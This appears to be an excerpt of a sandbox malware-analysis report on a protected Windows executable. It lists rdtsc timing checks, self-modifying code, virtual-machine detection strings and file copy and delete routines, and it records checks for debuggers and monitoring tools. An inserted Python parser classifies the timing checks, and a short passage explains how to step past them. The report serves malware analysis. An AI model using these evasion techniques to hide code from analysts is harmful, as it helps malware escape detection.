                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B8BB second address: D0B8BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B8BF second address: D0B8C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B8C5 second address: D0B8F0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F68950EC3BFh 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F68950EC3C6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0C3E9 second address: D0C3F3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F68950E798Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1003F second address: D1005B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F68950EC3C1h 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D142DF second address: D14322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 js 00007F68950E7986h 0x0000000b jmp 00007F68950E7993h 0x00000010 popad 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a push esi 0x0000001b pop esi 0x0000001c pushad 0x0000001d popad 0x0000001e pop edi 0x0000001f jmp 00007F68950E7996h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D30EA3 second address: D30EBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F68950EC3C0h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D30EBF second address: D30EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F895 second address: D3F8A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jbe 00007F68950EC3B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F8A6 second address: D3F8AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F8AB second address: D3F8E9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F68950EC3BAh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007F68950EC3BBh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jmp 00007F68950EC3BAh 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F68950EC3C6h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F8E9 second address: D3F8F6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F8F6 second address: D3F8FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3FA52 second address: D3FA77 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F68950E7986h 0x00000008 je 00007F68950E7986h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F68950E798Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007F68950E7986h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3FA77 second address: D3FA7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3FBE6 second address: D3FBEC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3FBEC second address: D3FBF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3FBF7 second address: D3FBFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D40053 second address: D4007B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jp 00007F68950EC3B6h 0x00000010 push esi 0x00000011 pop esi 0x00000012 jmp 00007F68950EC3C4h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4007B second address: D40080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D40080 second address: D4008A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F68950EC3B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D401FC second address: D4021B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E7999h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4035C second address: D40375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jo 00007F68950EC3B6h 0x00000012 jnp 00007F68950EC3B6h 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D40375 second address: D4037B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4037B second address: D4037F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D40515 second address: D40521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D40521 second address: D40538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950EC3C2h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D40538 second address: D40542 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F68950E7986h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D406E0 second address: D406F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950EC3C2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4200A second address: D42012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47943 second address: D47975 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950EC3BBh 0x00000007 jmp 00007F68950EC3BDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop esi 0x0000000f pushad 0x00000010 pushad 0x00000011 jnp 00007F68950EC3B6h 0x00000017 push edx 0x00000018 pop edx 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e je 00007F68950EC3B6h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47975 second address: D47984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F68950E7986h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4A223 second address: D4A227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4A227 second address: D4A22D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4A488 second address: D4A48C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BB51 second address: D4BB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BB57 second address: D4BB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4D963 second address: D4D969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4D969 second address: D4D96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53902D6 second address: 53902DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53902DA second address: 53902DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53902DE second address: 53902E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53902E4 second address: 53902EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53902EA second address: 5390303 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E798Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390303 second address: 5390307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390307 second address: 539030D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539030D second address: 539034D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F68950EC3C2h 0x00000009 jmp 00007F68950EC3C5h 0x0000000e popfd 0x0000000f mov cx, 6187h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 pushad 0x00000018 mov edx, 53210F9Eh 0x0000001d push eax 0x0000001e push edx 0x0000001f mov di, FF38h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539034D second address: 539039F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E7991h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F68950E798Eh 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F68950E798Dh 0x0000001b sub eax, 746FF086h 0x00000021 jmp 00007F68950E7991h 0x00000026 popfd 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539039F second address: 53903A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539045D second address: 5390461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390461 second address: 5390467 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390467 second address: 539046D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539046D second address: 5390471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390471 second address: 539047F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539047F second address: 5390484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
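The records above list every pair of consecutive rdtsc reads the sandbox intercepted, together with the instructions executed between them: almost entirely register-neutral filler (push r / pop r, pushad / popad, conditional jumps to one target), with the real function prologue (xchg eax, ebp / mov ebp, esp at 539034D) interleaved, which is consistent with the Oreans / WinLicense strings found in memory further down. The Python below is an added example, not Joe Sandbox code and not code from the sample: it parses these records, derives the list of rdtsc sites to breakpoint or patch, and classifies each gap by whether the first timestamp is discarded (pop edx / pop eax overwrite it before any use) or kept (push eax / push edx), whether an adjacent complementary jcc pair to the same target forms an unconditional jump, and which instructions do real work. The five embedded records are copied from the section above; the classification rules are this example's own heuristics.

```python
"""Parse the 'RDTSC instruction interceptor' records of a Joe Sandbox report and
classify the code executed between each pair of rdtsc reads. Added example: not part
of Joe Sandbox or of the analysed sample; the classification rules are heuristics."""
import re
from dataclasses import dataclass

# Constructed sample: five records copied from the report section above.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F8E9 second address: D3F8F6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F8F6 second address: D3F8FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3FA52 second address: D3FA77 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F68950E7986h 0x00000008 je 00007F68950E7986h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F68950E798Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007F68950E7986h 0x0000001d rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3FA77 second address: D3FA7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539034D second address: 539039F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E7991h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F68950E798Eh 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F68950E798Dh 0x0000001b sub eax, 746FF086h 0x00000021 jmp 00007F68950E7991h 0x00000026 popfd 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc",
]

RECORD = re.compile(r"RDTSC instruction interceptor: First address: ([0-9A-Fa-f]+) "
                    r"second address: ([0-9A-Fa-f]+) instructions: (.*)$")
OFFSET = re.compile(r"\s*0x([0-9A-Fa-f]{8})\s+")      # splits "0x00000002 push ebx 0x..."
JCC = {"je", "jne", "jz", "jnz", "jp", "jnp", "jo", "jno", "js", "jns",
       "jl", "jge", "jle", "jg", "jb", "jae", "jbe", "ja"}
COMPLEMENTS = {frozenset(p) for p in (("je", "jne"), ("jz", "jnz"), ("jp", "jnp"), ("jo", "jno"),
               ("js", "jns"), ("jl", "jge"), ("jle", "jg"), ("jb", "jae"), ("jbe", "ja"))}
STACK_EFFECT = {"push": 1, "pop": -1, "pushfd": 1, "popfd": -1, "pushad": 8, "popad": -8}
FILLER = {"pushad", "popad", "pushfd", "popfd", "jmp"} | JCC    # moves no data into registers


@dataclass
class RdtscPair:
    first: int          # address of the first rdtsc
    second: int         # address of the second rdtsc
    between: list       # instruction texts listed strictly between them

    @property
    def gap(self):
        return self.second - self.first

    def net_stack_dwords(self):
        """Stack growth across the gap in 32-bit slots (pushad counts 8)."""
        return sum(STACK_EFFECT.get(t.split()[0], 0) for t in self.between)

    def opaque_jump_pairs(self):
        """Adjacent complementary jcc to one target: an unconditional jump in disguise."""
        found = []
        for a, b in zip(self.between, self.between[1:]):
            ma, *ta = a.split()
            mb, *tb = b.split()
            if ma in JCC and mb in JCC and ta and ta == tb and frozenset((ma, mb)) in COMPLEMENTS:
                found.append((ma, mb, ta[0]))
        return found

    def real_work(self):
        """Instructions that are neither filler nor plain push/pop."""
        return [t for t in self.between
                if t.split()[0] not in FILLER and t.split()[0] not in STACK_EFFECT]

    def result_fate(self):
        """What happens to the edx:eax written by the first rdtsc."""
        head = _strip_filler(self.between)[:2]
        if head == ["pop edx", "pop eax"]:
            return "discarded"     # both halves overwritten before any use
        if head == ["push eax", "push edx"]:
            return "saved"         # timestamp kept on the stack for a later comparison
        return "other"


def _strip_filler(texts):
    """Drop filler and any 'push r' immediately undone by 'pop r'."""
    out, i = [], 0
    while i < len(texts):
        parts = texts[i].split()
        if parts[0] in FILLER:
            i += 1
        elif parts[0] == "push" and i + 1 < len(texts) and texts[i + 1] == "pop " + parts[1]:
            i += 2
        else:
            out.append(texts[i])
            i += 1
    return out


def parse_lines(lines):
    pairs = []
    for line in lines:
        m = RECORD.search(line)
        if not m:
            continue                                # other signature lines are ignored
        first, second, listing = m.groups()
        parts = OFFSET.split(listing.strip())       # ['', off, insn, off, insn, ...]
        insns = [t.strip() for t in parts[2::2]]
        if len(insns) < 2 or insns[0] != "rdtsc" or insns[-1] != "rdtsc":
            raise ValueError(f"unexpected listing shape at {first}")
        pairs.append(RdtscPair(int(first, 16), int(second, 16), insns[1:-1]))
    return pairs


def rdtsc_sites(pairs):
    """Unique rdtsc addresses: the breakpoint or patch list for a debugger session."""
    return sorted({a for p in pairs for a in (p.first, p.second)})


def summarize(pairs):
    return [{"first": f"{p.first:X}", "second": f"{p.second:X}", "gap": p.gap,
             "fate": p.result_fate(), "opaque_jumps": len(p.opaque_jump_pairs()),
             "real_work": p.real_work()} for p in pairs]
```

Run `summarize(parse_lines(SAMPLE_LINES))` to get one row per record. In the sandbox the interceptor feeds rdtsc consistent values; in an interactive debugger, single-stepping through these blocks inflates the deltas the packer later compares, so run to a hardware breakpoint past the last site of a chain rather than stepping through it.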
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AB1859 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AB1910 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C5BB1A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C6BA09 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CE48B6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_008638B0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00864910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00864910
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0085DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0085DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0085E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0085E430
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0085ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_0085ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00864570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_00864570
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00863EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00863EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0085F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0085F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_008516D0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0085DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0085DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0085BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_0085BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00851160 GetSystemInfo,ExitProcess,1_2_00851160
                Source: file.exe, file.exe, 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000001.00000002.1472692554.0000000001625000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWw
                Source: file.exe, 00000001.00000002.1472692554.00000000015AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000001.00000002.1472692554.0000000001625000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000001.00000002.1472692554.00000000015F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                Source: file.exe, 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node (graph_1-13683)
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node (graph_1-13686)
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node (graph_1-13705)
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node (graph_1-13737)
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node (graph_1-13697)
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
